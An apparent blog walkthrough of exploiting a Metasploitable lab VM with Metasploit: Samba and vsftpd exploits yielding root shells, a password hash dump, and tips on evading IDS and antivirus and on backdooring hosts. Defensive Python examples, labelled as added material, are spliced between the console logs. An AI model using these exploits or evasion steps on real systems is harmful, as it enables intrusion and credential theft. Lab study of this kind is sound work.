Metasploit is a powerful tool for exploiting vulnerabilities on remote hosts. It lets you run an exploit against a host and execute a payload with very little effort. I will take a look at some basics of Metasploit and use it to exploit some vulnerabilities in a Metasploitable VM.
Start up the Metasploit framework from Kali; it is listed under Applications -> Exploitation Tools.
msf > version
Framework: 4.11.5-2015121501
Console : 4.11.5-2015121501.15168
I can execute relevant Linux commands from within the msf console.
msf > ifconfig
[*] exec: ifconfig
eth0 Link encap:Ethernet HWaddr 00:0c:29:fa:df:2f
inet addr:192.168.238.136 Bcast:192.168.238.255 Mask:255.255.255.0
...
I can also use other tools within the msf console.
msf > nmap -sn 192.168.238.0/24
[*] exec: nmap -sn 192.168.238.0/24
Starting Nmap 6.49BETA5 ( https://nmap.org ) at 2016-01-05 18:13 EST
Nmap scan report for 192.168.238.1
Host is up (0.00044s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.238.2
Host is up (0.000050s latency).
MAC Address: 00:50:56:E9:39:5C (VMware)
Nmap scan report for 192.168.238.131
Host is up (0.00049s latency).
MAC Address: 00:0C:29:54:6E:48 (VMware)
Nmap scan report for 192.168.238.254
Host is up (0.00011s latency).
MAC Address: 00:50:56:FF:4C:2F (VMware)
Nmap scan report for 192.168.238.136
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 1.79 seconds
msf > nmap -sV 192.168.238.131
[*] exec: nmap -sV 192.168.238.131
Starting Nmap 6.49BETA5 ( https://nmap.org ) at 2016-01-05 18:30 EST
Nmap scan report for 192.168.238.131
Host is up (0.00014s latency).
Not shown: 977 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
53/tcp open domain ISC BIND 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
512/tcp open exec netkit-rsh rexecd
513/tcp open login?
514/tcp open tcpwrapped
1099/tcp open rmiregistry GNU Classpath grmiregistry
1524/tcp open shell Metasploitable root shell
2049/tcp open nfs 2-4 (RPC #100003)
2121/tcp open ftp ProFTPD 1.3.1
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open vnc VNC (protocol 3.3)
6000/tcp open X11 (access denied)
6667/tcp open irc Unreal ircd
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
MAC Address: 00:0C:29:54:6E:48 (VMware)
Service Info: Hosts: metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.06 seconds
I will try to gain shell access by exploiting Samba. Metasploitable has two ports for Samba open: port 139 and port 445. Port 445 runs Samba over SMB directly on top of TCP, while port 139 runs Samba over the NetBIOS session service on top of TCP.
I can search for exploits in the database using the search command:
msf > search Samba
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/admin/smb/samba_symlink_traversal normal Samba Symlink Directory Traversal
auxiliary/dos/samba/lsa_addprivs_heap normal Samba lsa_io_privilege_set Heap Overflow
auxiliary/dos/samba/lsa_transnames_heap normal Samba lsa_io_trans_names Heap Overflow
...
The results show the module name, the date the vulnerability was disclosed, a rank (based on the reliability of the exploit and its range of targets), and a description that includes the affected OS and service versions.
Metasploit also offers a grep command, which gives more search flexibility at the cost of the table formatting:
msf > grep -i samba search
auxiliary/admin/smb/samba_symlink_traversal normal Samba Symlink Directory Traversal
auxiliary/dos/samba/lsa_addprivs_heap normal Samba lsa_io_privilege_set Heap Overflow
auxiliary/dos/samba/lsa_transnames_heap normal Samba lsa_io_trans_names Heap Overflow
auxiliary/dos/samba/read_nttrans_ea_list normal Samba read_nttrans_ea_list Integer Overflow
auxiliary/scanner/smb/smb_uninit_cred normal Samba _netr_ServerPasswordSet Uninitialized Credential State
exploit/freebsd/samba/trans2open 2003-04-07 great Samba trans2open Overflow (*BSD x86)
exploit/linux/samba/chain_reply 2010-06-16 good Samba chain_reply Memory Corruption (Linux x86)
I’ll be limited to exploits against Linux, since my only target is Metasploitable. I’m going to just pick one at random and go from there.
msf > use exploit/linux/samba/lsa_transnames_heap
msf exploit(lsa_transnames_heap) > show options
Module options (exploit/linux/samba/lsa_transnames_heap):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE LSARPC yes The pipe name to use
Exploit target:
Id Name
-- ----
0 Linux vsyscall
RHOST is the target of the attack.
msf exploit(lsa_transnames_heap) > set RHOST 192.168.238.131
RHOST => 192.168.238.131
I will start with a simple payload that binds a shell on the target.
msf exploit(lsa_transnames_heap) > set payload linux/x86/shell/bind_tcp
payload => linux/x86/shell/bind_tcp
msf exploit(lsa_transnames_heap) > show options
Module options (exploit/linux/samba/lsa_transnames_heap):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.238.131 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE LSARPC yes The pipe name to use
Payload options (linux/x86/shell/bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LPORT 4444 yes The listen port
RHOST 192.168.238.131 no The target address
Exploit target:
Id Name
-- ----
0 Linux vsyscall
It looks like Metasploit has all the information it needs.
msf exploit(lsa_transnames_heap) > exploit
[*] Started bind handler
[*] Creating nop sled....
[*] Trying to exploit Samba with address 0xffffe410...
[*] Connecting to the SMB service...
[-] Exploit aborted due to failure: no-target: This target is not a vulnerable Samba server (Samba 3.0.20-Debian)
[*] Exploit completed, but no session was created.
The exploit didn’t work. Trying the next exploit:
msf exploit(lsa_transnames_heap) > use exploit/linux/samba/setinfopolicy_heap
msf exploit(setinfopolicy_heap) > show options
Module options (exploit/linux/samba/setinfopolicy_heap):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
StartBrute no Start Address For Brute Forcing
StopBrute no Stop Address For Brute Forcing
Exploit target:
Id Name
-- ----
0 2:3.5.11~dfsg-1ubuntu2 on Ubuntu Server 11.10
I need to set RHOST and the payload again whenever I switch to a new exploit.
msf exploit(setinfopolicy_heap) > set RHOST 192.168.238.131
RHOST => 192.168.238.131
msf exploit(setinfopolicy_heap) > set payload linux/x86/shell/bind_tcp
payload => linux/x86/shell/bind_tcp
msf exploit(setinfopolicy_heap) > exploit
[*] Started bind handler
[*] Trying to exploit Samba with address 0xb67f1000...
[-] Server is most likely patched...
[*] Trying to exploit Samba with address 0xb67f2000...
[-] Server is most likely patched...
[*] Trying to exploit Samba with address 0xb67f4000...
[-] Server is most likely patched...
^C[-] Exploit failed: Interrupt
[*] Exploit completed, but no session was created.
This exploit didn’t work either. Trying another:
msf exploit(setinfopolicy_heap) > use exploit/multi/samba/usermap_script
msf exploit(usermap_script) > show options
Module options (exploit/multi/samba/usermap_script):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 139 yes The target port
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(usermap_script) > set RHOST 192.168.238.131
RHOST => 192.168.238.131
msf exploit(usermap_script) > exploit
[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo ciZ6DcyeZcCJsNkV;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "ciZ6DcyeZcCJsNkV\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.238.136:4444 -> 192.168.238.131:33372) at 2016-01-05 19:49:21 -0500
Success! I have a shell on the target. Pressing CTRL+Z backgrounds the session so I can keep using the console.
^Z
Background session 1? [y/N] y
msf exploit(usermap_script) >
The usermap_script module exploits a command execution vulnerability in Samba through the username field. Since the username is supplied before authentication, this exploit requires no credentials at all!
At this point there are two directions to go: payloads or post-exploitation modules.
Metasploit offers over 200 payloads, but not every payload is compatible with every exploit. Most payloads simply open a reverse shell back to Metasploit, but a few can add and edit files and users, change file permissions, perform DLL injection, or load Meterpreter. Meterpreter is by far the coolest payload Metasploit offers: it resides solely in memory (leaving no trace on disk), injects itself into an existing process via DLL injection (so it does not spawn a new process), and all communication with Meterpreter is encrypted.
Once Meterpreter is running on a machine, it is totally pwnd. Meterpreter gives you a whole environment on the compromised machine: you can run commands, capture screenshots of the desktop, view the webcam, move the mouse, and capture keyboard input. Since Meterpreter runs only in memory, it is gone once the machine restarts. It would be best to backdoor the machine.
Post-exploitation modules let us gather information, pivot to other machines, sniff the network, set up a backdoor, and so on.
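To show the root cause from the defender's side, here is an added example (not code from the post or from Samba) of the pattern behind the bug in miniature: an unsafe builder splices the client-supplied username into a shell command line, while the hardened versions either shell-quote it or validate it against an allowlist and pass it as one argv element so no shell parses it. The script path and usernames are made up for the illustration.

```python
import re
import shlex
import subprocess
import sys

# Allowlist for account names; spaces, quotes, ';', '`', '|' and friends are rejected.
USERNAME_RE = re.compile(r"[A-Za-z0-9._-]{1,32}")

def unsafe_map_command(script: str, username: str) -> str:
    # Vulnerable pattern: the client-supplied name is spliced into a string that a
    # shell would parse (hypothetical script path). Returned for inspection only.
    return f"{script} {username}"

def is_valid_username(username: str) -> bool:
    return USERNAME_RE.fullmatch(username) is not None

def quoted_map_command(script: str, username: str) -> str:
    # Hardening option 1: shell-quote the name so metacharacters lose their meaning.
    return f"{script} {shlex.quote(username)}"

def safe_map_argv(script: str, username: str) -> list:
    # Hardening option 2 (preferred): validate, then pass the name as a single argv
    # element with no shell anywhere in the path.
    if not is_valid_username(username):
        raise ValueError(f"rejected username: {username!r}")
    return [script, username]

def echo_via_argv(username: str) -> str:
    # Proof that argv passing keeps the name literal: a stand-in "map script" (this
    # Python interpreter) prints back exactly the single argument it received.
    argv = [sys.executable, "-c", "import sys; print(sys.argv[1])", username]
    out = subprocess.run(argv, capture_output=True, text=True, check=True).stdout
    return out.rstrip("\n")
```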
msf exploit(usermap_script) > search post/linux/gather
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
post/linux/gather/checkvm normal Linux Gather Virtual Environment Detection
post/linux/gather/ecryptfs_creds normal Gather eCryptfs Metadata
post/linux/gather/enum_configs normal Linux Gather Configurations
post/linux/gather/enum_network normal Linux Gather Network Information
post/linux/gather/enum_protections normal Linux Gather Protection Enumeration
post/linux/gather/enum_psk normal Linux Gather 802-11-Wireless-Security Credentials
post/linux/gather/enum_system normal Linux Gather System and User Information
...
I will use a script to gather information from the machine.
msf exploit(usermap_script) > use post/linux/gather/enum_system
I have a session saved from earlier, which I see using the following command.
msf post(enum_system) > sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 shell unix 192.168.238.136:4444 -> 192.168.238.131:33372 (192.168.238.131)
msf post(enum_system) > show options
Module options (post/linux/gather/enum_system):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
msf post(enum_system) > set SESSION 1
SESSION => 1
msf post(enum_system) > exploit
[+] Info:
Login with msfadmin/msfadmin to get starteded network! ____
[+] Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
[+] Module running as "root" user
[*] Linux version stored in /root/.msf5/loot/20160105212135_default_192.168.238.131_linux.enum.syste_273307.txt
[*] User accounts stored in /root/.msf5/loot/20160105212135_default_192.168.238.131_linux.enum.syste_703384.txt
[*] Installed Packages stored in /root/.msf5/loot/20160105212135_default_192.168.238.131_linux.enum.syste_304431.txt
[*] Running Services stored in /root/.msf5/loot/20160105212135_default_192.168.238.131_linux.enum.syste_305863.txt
[*] Cron jobs stored in /root/.msf5/loot/20160105212135_default_192.168.238.131_linux.enum.syste_807045.txt
[*] Disk info stored in /root/.msf5/loot/20160105212135_default_192.168.238.131_linux.enum.syste_687962.txt
[*] Logfiles stored in /root/.msf5/loot/20160105212135_default_192.168.238.131_linux.enum.syste_837062.txt
[*] Setuid/setgid files stored in /root/.msf5/loot/20160105212135_default_192.168.238.131_linux.enum.syste_887699.txt
[*] Post module execution completed
There’s a lot of intel in these files. I want to try and gather some password hashes.
msf post(enum_system) > use post/linux/gather/hashdump
msf post(hashdump) > show options
Module options (post/linux/gather/hashdump):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
msf post(hashdump) > set session 1
session => 1
msf post(hashdump) > exploit
[+] root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:0:0:root:/root:/bin/bash
[+] sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:3:3:sys:/dev:/bin/sh
[+] klog:$1$f2ZVMS4K$R9XkI.CmLdHhdUE3X9jqP0:103:104::/home/klog:/bin/false
[+] msfadmin:$1$XN10Zj2c$Rt/zzCW3mLtUWA.ihZjA5/:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
[+] postgres:$1$Rw35ik.x$MgQgZUuO5pAoUvfJhfcYe/:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
[+] user:$1$HESu9xrH$k.o3G93DGoXIiQKkPmUgZ0:1001:1001:just a user,111,,:/home/user:/bin/bash
[+] service:$1$kR3ue7JZ$7GxELDupr5Ohp6cjZ3Bu//:1002:1002:,,,:/home/service:/bin/bash
[+] Unshadowed Password File: /root/.msf5/loot/20160105212317_default_192.168.238.131_linux.hashes_446028.txt
[*] Post module execution completed
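As an added example (not code from the post or from Metasploit), the following Python audits the unshadowed output above the way a defender reviewing this host would: it parses the msf-prefixed lines, identifies the crypt(3) scheme from the hash prefix, and lists accounts that combine a fast legacy scheme with a shell that permits interactive login. The scheme table extends beyond the md5crypt seen here so the audit is reusable on other hosts.

```python
import re
from dataclasses import dataclass

# Sample input: the hashdump output quoted above, fed in verbatim (msf prefixes included).
SAMPLE_OUTPUT = """\
[+] root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:0:0:root:/root:/bin/bash
[+] sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:3:3:sys:/dev:/bin/sh
[+] klog:$1$f2ZVMS4K$R9XkI.CmLdHhdUE3X9jqP0:103:104::/home/klog:/bin/false
[+] msfadmin:$1$XN10Zj2c$Rt/zzCW3mLtUWA.ihZjA5/:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
[+] postgres:$1$Rw35ik.x$MgQgZUuO5pAoUvfJhfcYe/:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
[+] user:$1$HESu9xrH$k.o3G93DGoXIiQKkPmUgZ0:1001:1001:just a user,111,,:/home/user:/bin/bash
[+] service:$1$kR3ue7JZ$7GxELDupr5Ohp6cjZ3Bu//:1002:1002:,,,:/home/service:/bin/bash
[*] Post module execution completed
"""
# crypt(3) prefixes; goes beyond the md5crypt seen on this host.
SCHEMES = {"$1$": "md5crypt", "$2a$": "bcrypt", "$2b$": "bcrypt", "$2y$": "bcrypt",
           "$5$": "sha256crypt", "$6$": "sha512crypt", "$7$": "scrypt", "$y$": "yescrypt"}
LEGACY = {"descrypt", "md5crypt"}   # fast schemes: cheap to crack offline once dumped
NOLOGIN = {"/bin/false", "/usr/sbin/nologin", "/sbin/nologin", "/bin/sync"}

@dataclass
class Account:
    name: str
    pw_hash: str
    uid: int
    shell: str

def hash_scheme(pw_hash: str) -> str:
    if pw_hash == "":
        return "empty"            # no password at all
    if pw_hash[0] in "*!":
        return "locked"
    for prefix, scheme in SCHEMES.items():
        if pw_hash.startswith(prefix):
            return scheme
    return "descrypt" if len(pw_hash) == 13 else "unknown"

def parse_unshadowed(text: str) -> list:
    accounts = []
    for line in text.splitlines():
        fields = re.sub(r"^\[[-+*]\]\s*", "", line.strip()).split(":")
        if len(fields) == 7:      # passwd layout; module status lines fall through
            accounts.append(Account(fields[0], fields[1], int(fields[2]), fields[6]))
    return accounts

def weak_interactive_accounts(accounts: list) -> list:
    # Accounts whose hash is offline-crackable AND which can log in interactively.
    return [a.name for a in accounts
            if hash_scheme(a.pw_hash) in LEGACY and a.shell not in NOLOGIN]
```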
For fun, I’ll exploit another service. Metasploitable is running vsftpd, so I’ll search for exploits.
msf post(hashdump) > search vsftp
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent VSFTPD v2.3.4 Backdoor Command Execution
msf post(hashdump) > use exploit/unix/ftp/vsftpd_234_backdoor
msf exploit(vsftpd_234_backdoor) > show options
Module options (exploit/unix/ftp/vsftpd_234_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 21 yes The target port
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(vsftpd_234_backdoor) > set RHOST 192.168.238.131
RHOST => 192.168.238.131
msf exploit(vsftpd_234_backdoor) > exploit
[*] Banner: 220 (vsFTPd 2.3.4)
[*] USER: 331 Please specify the password.
[+] Backdoor service has been spawned, handling...
[+] UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 2 opened (192.168.238.136:40469 -> 192.168.238.131:6200) at 2016-01-05 21:44:56 -0500
^Z
Background session 2? [y/N] y
This gives a second session.
msf exploit(vsftpd_234_backdoor) > show sessions
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 shell unix 192.168.238.136:4444 -> 192.168.238.131:55821 (192.168.238.131)
2 shell unix 192.168.238.136:40469 -> 192.168.238.131:6200 (192.168.238.131)
While Metasploit is an amazingly simple tool to use, one should be mindful of what’s going on under the hood to avoid the “script kiddie” moniker. Some things to keep in mind:
- A decently tuned IDS will probably see you exploiting the service over the wire. Metasploit offers alternate transports, as well as different encoding schemes and fragmentation (note: encoding is NOT a good way of avoiding AV). Using an encrypted channel will also render the attack invisible to the IDS.
- Depending on the exploit or the payload, antivirus may catch on and mark your payload as malicious. DLL injection is an obvious way of avoiding AV because AV only scans the disk, but some exploits require disk writes. When injecting a payload into another process, Metasploit uses a default executable template which is easily detected by AV, regardless of the presence of a payload. If the target has any sort of AV, it is a good idea to change the executable template.
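On the detection side, here is an added example (not from the post) of the kind of correlation an IDS or log pipeline can do without inspecting payload contents: using the open-port list from the nmap scan above as the expected service set, it flags any new connection between the same two hosts on an unexpected port shortly after a service connection. That is exactly the shape of both sessions in this walkthrough: the reverse shell to port 4444 after the Samba hit on 139, and the bind shell on 6200 after the vsftpd hit on 21. The connection records, their timestamps and the record format are constructed for the illustration.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta

TARGET = "192.168.238.131"
ATTACKER = "192.168.238.136"
# Ports the nmap -sV scan found open on the target: connections to these are expected.
EXPECTED_SERVICE_PORTS = {21, 22, 23, 25, 53, 80, 111, 139, 445, 512, 513, 514, 1099,
                          1524, 2049, 2121, 3306, 5432, 5900, 6000, 6667, 8009, 8180}

@dataclass
class Conn:
    ts: datetime
    src: str
    sport: int
    dst: str
    dport: int

def find_followon_shells(conns, window=timedelta(seconds=30)):
    """For each connection to a port outside the expected service set, look back for a
    recent connection to an expected service between the same pair of hosts. A hit in the
    same direction looks like a bind shell; the target calling out looks like a reverse shell.
    Returns (target, service_port, shell_port, kind) tuples in time order."""
    conns = sorted(conns, key=lambda c: c.ts)
    alerts = []
    for i, c in enumerate(conns):
        if c.dport in EXPECTED_SERVICE_PORTS:
            continue                                 # ordinary service traffic
        for prior in reversed(conns[:i]):
            if c.ts - prior.ts > window:
                break                                # too old to be the trigger
            if prior.dport in EXPECTED_SERVICE_PORTS and {prior.src, prior.dst} == {c.src, c.dst}:
                kind = "reverse" if c.src == prior.dst else "bind"
                alerts.append((prior.dst, prior.dport, c.dport, kind))
                break
    return alerts

# Constructed records modelled on the two sessions above; the service-side hits are assumed.
SAMPLE_CONNS = [
    Conn(datetime(2016, 1, 5, 18, 0, 0), "192.168.238.1", 50123, TARGET, 9999),  # stray, no prior service
    Conn(datetime(2016, 1, 5, 18, 30, 5), ATTACKER, 41000, TARGET, 80),          # nmap -sV probe
    Conn(datetime(2016, 1, 5, 19, 49, 12), ATTACKER, 52010, TARGET, 139),        # usermap_script
    Conn(datetime(2016, 1, 5, 19, 49, 21), TARGET, 33372, ATTACKER, 4444),       # reverse shell
    Conn(datetime(2016, 1, 5, 21, 44, 50), ATTACKER, 52200, TARGET, 21),         # vsftpd 2.3.4
    Conn(datetime(2016, 1, 5, 21, 44, 56), ATTACKER, 40469, TARGET, 6200),       # backdoor shell
]
```

The stray connection to 9999 produces no alert because no service connection precedes it within the window, which keeps the rule from firing on every odd port.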
I’m sure I’ll be doing some more advanced attacks with Metasploit later to show off some more features.